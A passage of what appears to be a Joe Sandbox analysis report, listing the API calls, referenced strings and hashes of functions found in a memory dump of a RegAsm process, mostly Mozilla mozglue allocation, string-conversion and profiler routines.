                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                      • String ID:
                                                                                      • API String ID: 2325513730-0
                                                                                      • Opcode ID: ee091ce0d04b98bc12629b38cefec790342044e4e443e700c13a6346d79d1f72
                                                                                      • Instruction ID: af1f35cb5c18c618e289823b1ad652612fe589c8196921e50d0132c64a8d6730
                                                                                      • Opcode Fuzzy Hash: ee091ce0d04b98bc12629b38cefec790342044e4e443e700c13a6346d79d1f72
                                                                                      • Instruction Fuzzy Hash: EC418F717003059FCB00DF65C898AAEBBB5FF89358F548068E50A9B791EB35EC05DB61
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C0E31A7), ref: 6C11CDDD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocVirtual
                                                                                      • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                      • API String ID: 4275171209-2186867486
                                                                                      • Opcode ID: f7a20191c6df3b534ea7b3f9c488cc45006c42e41e356627e34c39311aa86a04
                                                                                      • Instruction ID: 25038466514ec2fac7365445514f9707c9e73ef781bc101aeaa18db06ae270bc
                                                                                      • Opcode Fuzzy Hash: f7a20191c6df3b534ea7b3f9c488cc45006c42e41e356627e34c39311aa86a04
                                                                                      • Instruction Fuzzy Hash: CD31E6307492165BEF10AFA68C65BBE7B76AF41718F304078F610ABEC0DB78D5009BA1
                                                                                      APIs
                                                                                      • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6C0EBC03
                                                                                      • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C0EBD06
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                      • String ID: 0$0$y
                                                                                      • API String ID: 2811501404-3020536412
                                                                                      • Opcode ID: 36148ccd8d5a7e7e487672850a5c1c5f8a39746fbcd6e18dfa6175dd466ad30d
                                                                                      • Instruction ID: 2039bc3fa3b44ee724a328bb6885d65e604176ceef2041284d2629c5195a3171
                                                                                      • Opcode Fuzzy Hash: 36148ccd8d5a7e7e487672850a5c1c5f8a39746fbcd6e18dfa6175dd466ad30d
                                                                                      • Instruction Fuzzy Hash: A161B171A487448FC714DF28C481B5FB7E9AF8D348F004A2EE889A7651EB30D949CB96
                                                                                      APIs
                                                                                        • Part of subcall function 6C0EF100: LoadLibraryW.KERNEL32(shell32,?,6C15D020), ref: 6C0EF122
                                                                                        • Part of subcall function 6C0EF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C0EF132
                                                                                      • moz_xmalloc.MOZGLUE(00000012), ref: 6C0EED50
                                                                                      • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C0EEDAC
                                                                                      • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C0EEDCC
                                                                                      • CreateFileW.KERNEL32 ref: 6C0EEE08
                                                                                      • free.MOZGLUE(00000000), ref: 6C0EEE27
                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C0EEE32
                                                                                        • Part of subcall function 6C0EEB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C0EEBB5
                                                                                        • Part of subcall function 6C0EEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C11D7F3), ref: 6C0EEBC3
                                                                                        • Part of subcall function 6C0EEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C11D7F3), ref: 6C0EEBD6
                                                                                      Strings
                                                                                      • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C0EEDC1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                      • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                      • API String ID: 1980384892-344433685
                                                                                      • Opcode ID: 2dd9fdd4478367a3db52a8f8fa21b783c7defde760199d2f9d0a2ec728cee28d
                                                                                      • Instruction ID: f6079b6ae7b208b62481cc9a404dd6d1917b8011c4e2a237b1ab8b06f65efc9d
                                                                                      • Opcode Fuzzy Hash: 2dd9fdd4478367a3db52a8f8fa21b783c7defde760199d2f9d0a2ec728cee28d
                                                                                      • Instruction Fuzzy Hash: 7051A071D452088FDB00DF68D8447EEB7F1AF5D318F44852DE8656B780E731A989C7A2
                                                                                      APIs
                                                                                      • moz_xmalloc.MOZGLUE(0000000C,?,6C14B80C,00000000,?,?,6C0F003B,?), ref: 6C0F0A72
                                                                                        • Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26
                                                                                      • moz_xmalloc.MOZGLUE(?,?,6C14B80C,00000000,?,?,6C0F003B,?), ref: 6C0F0AF5
                                                                                      • free.MOZGLUE(00000000,?,?,6C14B80C,00000000,?,?,6C0F003B,?), ref: 6C0F0B9F
                                                                                      • free.MOZGLUE(?,?,?,6C14B80C,00000000,?,?,6C0F003B,?), ref: 6C0F0BDB
                                                                                      • free.MOZGLUE(00000000,?,?,6C14B80C,00000000,?,?,6C0F003B,?), ref: 6C0F0BED
                                                                                      • mozalloc_abort.MOZGLUE(alloc overflow,?,6C14B80C,00000000,?,?,6C0F003B,?), ref: 6C0F0C0A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$moz_xmalloc$mallocmozalloc_abort
                                                                                      • String ID: alloc overflow
                                                                                      • API String ID: 1471638834-749304246
                                                                                      • Opcode ID: 34d0aac8ab075d3b546cbd256cd4bc1e79c1df934655e018dfb3e623be5cb44a
                                                                                      • Instruction ID: e708b8a1e1d2f7e3f3328dacfc179451629bc0b2764c4f73abc67073aa7a9c7a
                                                                                      • Opcode Fuzzy Hash: 34d0aac8ab075d3b546cbd256cd4bc1e79c1df934655e018dfb3e623be5cb44a
                                                                                      • Instruction Fuzzy Hash: 875190B4A08246CFDB24CF58C880B6EB3F5EF4834CF54496DC86A9B601EB71E596CB51
                                                                                      APIs
                                                                                      • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C15A565
                                                                                        • Part of subcall function 6C15A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C15A4BE
                                                                                        • Part of subcall function 6C15A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C15A4D6
                                                                                      • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C15A65B
                                                                                      • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C15A6B6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                                      • String ID: 0$z
                                                                                      • API String ID: 310210123-2584888582
                                                                                      • Opcode ID: 1d6749d9c8c12b3c2d5ef2df6668cf409a262f44a06669580b46602cd2b6594f
                                                                                      • Instruction ID: f77a65b0073743283d704feb063fc5f798364650f6ce7b7fa08adf8afaf90fe7
                                                                                      • Opcode Fuzzy Hash: 1d6749d9c8c12b3c2d5ef2df6668cf409a262f44a06669580b46602cd2b6594f
                                                                                      • Instruction Fuzzy Hash: F0414BB19487459FC341DF28C080A9FBBF5BF89354F808A2EF4A987690E734D559CB92
                                                                                      APIs
                                                                                      • free.MOZGLUE(?,6C16008B), ref: 6C0E7B89
                                                                                      • free.MOZGLUE(?,6C16008B), ref: 6C0E7BAC
                                                                                        • Part of subcall function 6C0E78C0: free.MOZGLUE(?,6C16008B), ref: 6C0E7BCF
                                                                                      • free.MOZGLUE(?,6C16008B), ref: 6C0E7BF2
                                                                                        • Part of subcall function 6C105E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C105EDB
                                                                                        • Part of subcall function 6C105E90: memset.VCRUNTIME140(6C147765,000000E5,55CCCCCC), ref: 6C105F27
                                                                                        • Part of subcall function 6C105E90: LeaveCriticalSection.KERNEL32(?), ref: 6C105FB2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$CriticalSection$EnterLeavememset
                                                                                      • String ID:
                                                                                      • API String ID: 3977402767-0
                                                                                      • Opcode ID: e9e3df1437ee229f4481c3ff2953e55568b564c200d9b256f057732d309be53c
                                                                                      • Instruction ID: bd7ded2c3fbe6ebb9d2ba82a079b980a3dfc8ea3ff06facf85853352328f3e4e
                                                                                      • Opcode Fuzzy Hash: e9e3df1437ee229f4481c3ff2953e55568b564c200d9b256f057732d309be53c
                                                                                      • Instruction Fuzzy Hash: F6C1B631E451288FEB248B2CCC90B9DB7F2AF49314F1503A9D51AA7BC2D731AE858F51
                                                                                      APIs
                                                                                        • Part of subcall function 6C11AB89: EnterCriticalSection.KERNEL32(6C16E370,?,?,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284), ref: 6C11AB94
                                                                                        • Part of subcall function 6C11AB89: LeaveCriticalSection.KERNEL32(6C16E370,?,6C0E34DE,6C16F6CC,?,?,?,?,?,?,?,6C0E3284,?,?,6C1056F6), ref: 6C11ABD1
                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0F4A68), ref: 6C12945E
                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C129470
                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C129482
                                                                                      • __Init_thread_footer.LIBCMT ref: 6C12949F
                                                                                      Strings
                                                                                      • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C12946B
                                                                                      • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C12947D
                                                                                      • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C129459
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                      • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                      • API String ID: 4042361484-1628757462
                                                                                      • Opcode ID: d9a93a204a07de45dc56a1f024686b2a35bce0069885469b29df11b4fc6a2230
                                                                                      • Instruction ID: a17af7b45d0740a78fd9bdfa9a229db7c170a648b9e368648a4dfae2d50606b0
                                                                                      • Opcode Fuzzy Hash: d9a93a204a07de45dc56a1f024686b2a35bce0069885469b29df11b4fc6a2230
                                                                                      • Instruction Fuzzy Hash: AF014C3CA0410187DB00DB6FD935B653374AB0532DF048537DC0686F41E739D5A4995B
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C13124B
                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C131268
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C1312DA
                                                                                      • InitializeConditionVariable.KERNEL32(?), ref: 6C13134A
                                                                                      • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C13138A
                                                                                      • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C131431
                                                                                        • Part of subcall function 6C128AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C141563), ref: 6C128BD5
                                                                                      • free.MOZGLUE(?), ref: 6C13145A
                                                                                      • free.MOZGLUE(?), ref: 6C13146C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                                      • String ID:
                                                                                      • API String ID: 2803333873-0
                                                                                      • Opcode ID: 42695e97f4b9623f3515c76544ea4543feaae99427f667c338d8d53a29eadaf9
                                                                                      • Instruction ID: fb573007c384d71e7be8214e1382f316524bcd490387b337963ee1a7ece55ae7
                                                                                      • Opcode Fuzzy Hash: 42695e97f4b9623f3515c76544ea4543feaae99427f667c338d8d53a29eadaf9
                                                                                      • Instruction Fuzzy Hash: 0161EF75A043409BDB10DF25C880BAAB7F5BFC5308F14991DE89947B12EB31E899CB82
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C130F6B
                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C130F88
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C130FF7
                                                                                      • InitializeConditionVariable.KERNEL32(?), ref: 6C131067
                                                                                      • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C1310A7
                                                                                      • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C13114B
                                                                                        • Part of subcall function 6C128AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C141563), ref: 6C128BD5
                                                                                      • free.MOZGLUE(?), ref: 6C131174
                                                                                      • free.MOZGLUE(?), ref: 6C131186
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                                      • String ID:
                                                                                      • API String ID: 2803333873-0
                                                                                      • Opcode ID: 1a1ba82aa28ee9f7d9991a2f015e520ef80abb6c50bed14e08dbb591a7200f63
                                                                                      • Instruction ID: 643d89b715c94d7ba2d05619c7c253fb93379eafdab1b85431c4681e0149d744
                                                                                      • Opcode Fuzzy Hash: 1a1ba82aa28ee9f7d9991a2f015e520ef80abb6c50bed14e08dbb591a7200f63
                                                                                      • Instruction Fuzzy Hash: 6661DD75A043409BDB10DF25C8807AAB7F6BFD6308F14991DE89D47711EB31E989CB82
                                                                                      APIs
                                                                                      • free.MOZGLUE(?,?,?,6C0E4667,?,?,?,?,?,?,?,?,6C124843,?), ref: 6C0E4C63
                                                                                      • free.MOZGLUE(?,?,?,6C0E4667,?,?,?,?,?,?,?,?,6C124843,?), ref: 6C0E4C89
                                                                                      • free.MOZGLUE(?,?,?,6C0E4667,?,?,?,?,?,?,?,?,6C124843,?), ref: 6C0E4CAC
                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,6C124843,?), ref: 6C0E4CCF
                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,6C124843,?), ref: 6C0E4CF2
                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,6C124843,?), ref: 6C0E4D15
                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,6C124843,?), ref: 6C0E4D38
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C0E4667,?,?,?,?,?,?,?,?,6C124843,?), ref: 6C0E4DD1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: free$_invalid_parameter_noinfo_noreturn
                                                                                      • String ID:
                                                                                      • API String ID: 1497960986-0
                                                                                      • Opcode ID: d2e50d83ada1342e5de9858cb820c145985162fb8a120d9a2c37d7b97cf86fc7
                                                                                      • Instruction ID: 68ed132b163717c598bd6bcd48b2faddd9cd536a65b4d834b1bde642cae876f9
                                                                                      • Opcode Fuzzy Hash: d2e50d83ada1342e5de9858cb820c145985162fb8a120d9a2c37d7b97cf86fc7
                                                                                      • Instruction Fuzzy Hash: C9518571548A409FD7348BFCD9A871AB6E1AF49328F444B1CE0A7CBFD1D735A4448B41
                                                                                      APIs
                                                                                      • moz_xmalloc.MOZGLUE(?,?,?,6C0F1999), ref: 6C0EEA39
                                                                                      • memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6C0EEA5C
                                                                                      • memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6C0EEA76
                                                                                      • moz_xmalloc.MOZGLUE(-00000001,?,?,6C0F1999), ref: 6C0EEA9D
                                                                                      • memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6C0F1999), ref: 6C0EEAC2
                                                                                      • memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6C0EEADC
                                                                                      • free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6C0EEB0B
                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6C0EEB27
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                                      • String ID:
                                                                                      • API String ID: 706364981-0
                                                                                      • Opcode ID: b9365b2f8a665d536964b40eb3edd19a19a35b9a5d806787ac34728bce7de81f
                                                                                      • Instruction ID: d7f16b1a57a7933e0b67ccf60092b592f12a6b6b1f9c858527ac0b437dc4ed4c
                                                                                      • Opcode Fuzzy Hash: b9365b2f8a665d536964b40eb3edd19a19a35b9a5d806787ac34728bce7de81f
                                                                                      • Instruction Fuzzy Hash: 8341A4B1A402199FDB14DF68DC80BAF77E4FF49258F280628E825D7794E730EA548BD1
                                                                                      APIs
                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C13D36B
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C13D38A
                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C13D39D
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C13D3E1
                                                                                      • free.MOZGLUE ref: 6C13D408
                                                                                        • Part of subcall function 6C11CBE8: GetCurrentProcess.KERNEL32(?,6C0E31A7), ref: 6C11CBF1
                                                                                        • Part of subcall function 6C11CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0E31A7), ref: 6C11CBFA
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C13D44B
                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C13D457
                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?,?), ref: 6C13D472
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2557311614.000000006C0E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0E0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2557234381.000000006C0E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2560378930.000000006C15D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2561922875.000000006C16E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2562760479.000000006C172000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6c0e0000_RegAsm.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExclusiveLock$Current$AcquireProcessReleaseThread$StampTerminateTimeV01@@Value@mozilla@@free
                                                                                      • String ID:
                                                                                      • API String ID: 3843575911-0
                                                                                      • Opcode ID: 8c040543e0fbd80ba355e9d9fe167d8638701a2950cba9483c979c2d6464442e
                                                                                      • Instruction ID: 72c140fdfcd80e9e11e0cdbba42b3731c01d564cc29e482159003e42ed6f3a78
                                                                                      • Opcode Fuzzy Hash: 8c040543e0fbd80ba355e9d9fe167d8638701a2950cba9483c979c2d6464442e
                                                                                      • Instruction Fuzzy Hash: B241E1B1604315CFCB10EF65C488BAEBBB5FF85318F10492DE9A697B40DB31A948CB91
                                                                                      APIs
                                                                                      • moz_xmalloc.MOZGLUE(?,?,?,?,6C0EB61E,?,?,?,?,?,00000000), ref: 6C0EB6AC
                                                                                        • Part of subcall function 6C0FCA10: malloc.MOZGLUE(?), ref: 6C0FCA26
                                                                                      • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C0EB61E,?,?,?,?,?,00000000), ref: 6C0EB6D1
